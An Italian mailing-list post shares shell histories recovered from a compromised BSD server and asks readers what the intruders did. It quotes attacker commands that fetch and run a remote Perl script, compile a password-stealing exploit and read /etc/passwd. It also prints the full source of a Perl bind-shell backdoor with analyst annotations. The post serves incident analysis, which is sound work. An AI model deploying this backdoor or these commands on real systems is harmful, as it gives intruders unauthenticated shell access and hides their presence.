hacking ... lo studiamo ?

Gianmarco Giovannelli gmarco a giovannelli.it
Lun 28 Nov 2005 19:33:21 CET


Ho ricevuto questo messaggio da **** a proposito di un server bucato :-)

>      2  21:09   cd .psybsd
>      3  21:09   dir -la
>      4  21:09   cat psybnc.conf
>      5  21:10   rm -rf *
>      6  21:10   cd ..
>      7  21:10   cd ...
>      8  21:10   ls
>      9  21:10   cd psybnc
>     10  21:10   ls
>     11  21:10   export PATH="."
>     12  21:10   ./swapper
>     13  21:10   exit
>     14  16:49   w
>     15  16:49   ps -aux
>     16  16:49   dir -la
>     17  16:49   cd /var/tmp
>     18  16:49   dir -la
>     19  16:49   cd ...
>     20  16:49   dir
>     21  16:49   cd psybnc
>     22  16:49   ls
>     23  16:50   export
>     24  16:50   swapper
>     25  16:50   ps -aux
>     26  16:50   exit
>     27  16:54   cat /etc/passwd
>     28  16:56   last
>     29  16:59   last
>     30  16:59   w
>     31  16:59   ps -aux
>     32  16:59   exit
>     33  3:45    uname -a
>     34  3:45    bash
>     35  3:45    sh
>     36  3:49    exit
>     37  6:45    bash
>     38  6:45    sh
>     39  6:51    exit
>     40  11:59   /usr/bin/perl
>     41  11:59   ps x
>     42  11:59   ls
>     43  11:59   vi bds
>     44  11:59   perl bds
>     45  12:00   ps x
>     46  12:00   kill -9 76439 43695
>     47  12:00   ps x
>     48  12:00   exit
>     49  12:03   wget
>     50  12:03   curl
>     51  12:04   emacs
>     52  12:04   gwget
>     53  12:04   kget
>     54  12:04   kget www.com.com/q/1
>     55  12:05   kget www.com.com/q~./1
>     56  12:05   kget www.com.com/q.1
>     57  12:05   ls
>     58  12:05   kget www.com.com/q.1 1
>     59  12:05   touch 1
>     60  12:05   kget www.com.com/q.1 1
>     61  12:05   kget 1
>     62  12:05   cat 1
>     63  12:05   rm 1
>     64  12:06   gmake
>     65  12:06   fetch
>     66  12:07   fetch www.com.com
>     67  12:07   fetch http://slickland.com/rk/bds.txt -o b.txt
>     68  12:07   ls
>     69  12:08   head bds.txt
>     70  12:08   rm bds.txt
>     71  12:09   cd /tmp ; fetch http://slickland.com/rk/bds.txt ; 
> mv bds.txt bds.pl ; chmod 777 bds.pl ; perl bds.pl
>     72  12:09   ps x
>     73  12:09   kill -9 77329
>     74  12:10   cd ..
>     75  12:10   cd /
>     76  12:10   ls
>     77  12:13   exit
>     78  14:37   fetch slickland.com/xpl/bsdpass
>     79  14:38   fetch http://www.slickland.com/xpl/bsdpass
>     80  14:38   chmod +x bsdpass
>     81  14:38   ./bsdpass
>     82  14:38   rm bsdpass
>     83  14:38   vi bsdpass.c
>     84  14:38   gcc -o bsdpass bsdpass.c
>     85  14:39   ./bsdpass
>     86  14:40   ls
>     87  14:40   cat kmem
>     88  14:40   cat sendfile1
>     89  14:40   rm sendfile1
>     90  14:40   rm kmem
>     91  14:40   rm bsdpass.c
>     92  14:40   ls
>     93  14:40   ftp ftp.slickland.com
>     94  14:42   ftp ftp.slickland.com
>     95  14:43   rm bsdpass
>     96  14:43   ls
>     97  14:43   exit
>     98  23:48   history
>     99  23:48   history > hackterra.log
>    100  23:48   who
>    101  23:50   history
>
>ecco bds.txt (lo script scaricato da slickland.com e lanciato come bds.pl alle 12:09):
>#!/usr/bin/perl ^M
># NOTE(review): attacker's bind-shell backdoor as recovered from the host.
># Kept byte-for-byte (including the "^M" CRLF residue); the "#" lines are
># analyst annotations, not part of the recovered file.
># Listening port. Worth hunting for on the host (sockstat/netstat) and at the
># perimeter: an inbound TCP 4132 listener owned by a process named "vi".
>$port = 4132; ^M
>$hide = "vi";^M
># Anti-forensics: removes its own script from disk (unlink $0), then rewrites
># $0 so process listings show the NUL-padded name "vi" instead of the real
># command line.
>unlink($0); $0 = $hide . "\0" x16;^M
># INT/HUP/TERM are ignored so a plain kill or the attacker's logout does not
># stop it (kill -9 still does); CHLD is ignored as well.
>$SIG{'INT'}='IGNORE';$SIG{'HUP'}='IGNORE';$SIG{'TERM'}='IGNORE';^M
># Daemonizes: the parent exits, the child keeps running detached from the shell.
>$SIG{'CHLD'}='IGNORE'; if(fork()){exit(0);};^M
>use Socket; $proto = getprotobyname('tcp');^M
>socket(SERVER,PF_INET,SOCK_STREAM,$proto);^M
># SO_REUSEADDR lets it rebind immediately after a restart.
>setsockopt(SERVER,SOL_SOCKET,SO_REUSEADDR,pack("l",1));^M
># Binds on every interface (INADDR_ANY), not just loopback.
>bind(SERVER,sockaddr_in($port,INADDR_ANY));^M
>if(listen(SERVER,SOMAXCONN)) { print("## BDS Started. Port 
>$port\n"); } else { die "listen: $!" };^M
># Accept loop: the loop condition calls accept(), the "increment" closes the
># client socket, so one client is handled at a time.
>for(;$paddr = accept(CLIENT,SERVER);close CLIENT)^M
>{^M
>    # Redirects the process's stdio onto the client socket so every child
>    # forked below inherits the connection as its stdin/stdout/stderr.
>    open(STDIN,">&CLIENT");open(STDOUT,">&CLIENT");open(STDERR,">&CLIENT");^M
>    # Banner sent to the client; a usable network-detection string.
>    print("## BDS backdoor by Slick\n\n");^M
>    # No authentication of any kind: whoever connects gets a command prompt.
>    while(1)^M
>    {^M
>    print("[cmd]# ");^M
>    # Each command line runs in a forked child. exec() with a single string
>    # is handed to /bin/sh when the line contains shell metacharacters, so
>    # pipes and redirections work for the attacker.
>    if (fork() == 0) {^M
>      $cmd=<STDIN>;^M
>      chomp($cmd);^M
>      exec($cmd);^M
>      exit 0;^M
>                     }^M
>    wait;^M
>    # The while(1) has no exit: once the client disconnects, <STDIN> returns
>    # undef and the parent keeps forking children that exit at once, so in
>    # practice it never returns to accept() and the close() calls below are
>    # unreachable.
>    }^M
>    close(STDIN);close(STDOUT);close(STDERR);^M
>}
>~
>
>mi piacerebbe vedere il file bsdpass.c


ed ecco l'utente "info" (password "info", cioè uguale allo username, e con tanto di shell di login :-)

>ecco cosa ha fatto info
>
>      2  22:15   cd
>      3  22:15   w
>      4  22:15   cd ..
>      5  22:15   cd ..
>      6  22:15   cd ..
>      7  22:15   cd ..
>      8  22:15   cd ..
>      9  22:15   cd ..
>     10  22:15   cd ..
>     11  22:15   cd /
>     12  22:15   cd
>     13  22:15   cd //
>     14  22:15   cd .
>     15  22:16   cd usr
>     16  22:16   var
>     17  22:16   exit
>     18  6:58    cd /var/tmp/" "
>     19  6:58    cd .psybsd
>     20  6:58    ./httpd
>     21  6:59    cd
>     22  6:59    w
>     23  6:59    cd ..
>     24  6:59    cd ..
>     25  6:59    exit
>     26  7:10    cd /var/tmp
>     27  7:10    ls
>     28  7:10    cd" "
>     29  7:10    cd " "
>     30  7:10    ls
>     31  7:10    cd .psybsd
>     32  7:10    ./http
>     33  7:10    ./httpd
>     34  7:10    cd
>     35  7:10    cd ..
>     36  7:10    cd ..
>     37  7:10    cd ..
>     38  7:10    cd ..
>     39  7:10    w
>     40  7:10    exit
>     41  21:36   cd /var/tmp
>     42  21:36   ls
>     43  21:36   cd .``.``.
>     44  21:36   cd '" "cd " "
>     45  21:36   cd " "
>     46  21:36   ls
>     47  21:36   cd .psybsd
>     48  21:36   ./httpd
>     49  21:36   cd
>     50  21:36   exit
>     51  17:56   w
>     52  17:56   cd /var/tmp
>     53  17:56   ls
>     54  17:56   cd " "
>     55  17:56   ls
>     56  17:56   cd .psybsd
>     57  17:56   ls
>     58  17:56   pic psybnc.conf
>     59  17:57   ls
>     60  17:57   pic menuconf
>     61  17:58   pic psybnc.conf.old
>     62  17:59   pic log
>     63  18:05   uname -a
>     64  18:05   uname -s
>     65  18:05   w
>     66  18:06   cd ..
>     67  18:06   cd ..
>     68  18:06   cd
>     69  18:06   cd ..
>     70  18:06   cd ..
>     71  18:06   rm -rf .psybsd
>     72  18:06   ls
>     73  18:06   cd
>     74  18:06   cd ..
>     75  18:06   exit
>     76  18:06   cd /var/tmp/" "
>     77  18:07   rm -rf .psybsd
>     78  18:07   ls
>     79  18:07   ls -all
>     80  18:07   ftp
>     81  18:10   ps -x
>     82  18:10   killall -9 10745
>     83  18:11   cd .psybsd
>     84  18:11   ls
>     85  18:11   tar -xvzf psyBNC2.3.2-5.tar.gz
>     86  18:11   rm -rf psyBNC*
>     87  18:11   mv psybnc .psybsd
>     88  18:12   cd .psybsd
>     89  18:12   make
>     90  18:14   mv psybnc sshd
>     91  18:14   ls
>     92  18:14   ps -x
>     93  18:14   kill -9 10745
>     94  18:16   ./sshd
>     95  18:18   uname -a
>     96  18:19   cat /etc/hosts
>     97  18:20   cd
>     98  18:20   cd ..
>     99  18:20   cd ..
>    100  18:20   exit


Secondo voi che facevano ?

Per come la leggo io dai log: (1) installazione di psyBNC (un bouncer IRC) sotto /var/tmp in directory dal nome mimetizzato (`...`, `" "`, `.psybsd`), con il binario rinominato `sshd` presumibilmente per non dare nell'occhio in `ps`; (2) un backdoor Perl (bds.pl, porta TCP 4132) che dà una shell senza alcuna autenticazione a chiunque si colleghi, si cancella da disco e si spaccia per `vi` nella lista dei processi; (3) un binario `bsdpass` compilato dai sorgenti, dopo il quale compaiono i file `kmem` e `sendfile1`, il che fa pensare a un tentativo di leggere memoria del kernel per recuperare credenziali (non verificabile dal solo log: servirebbe appunto bsdpass.c). Tenete presente che la history della shell è facilmente manomettibile e qui riporta solo l'ora, non la data: va trattata come indizio, non come cronologia completa.






Best Regards,
Gianmarco Giovannelli ,  "Unix expert since yesterday"
http://utenti.gufi.org/~gmarco/


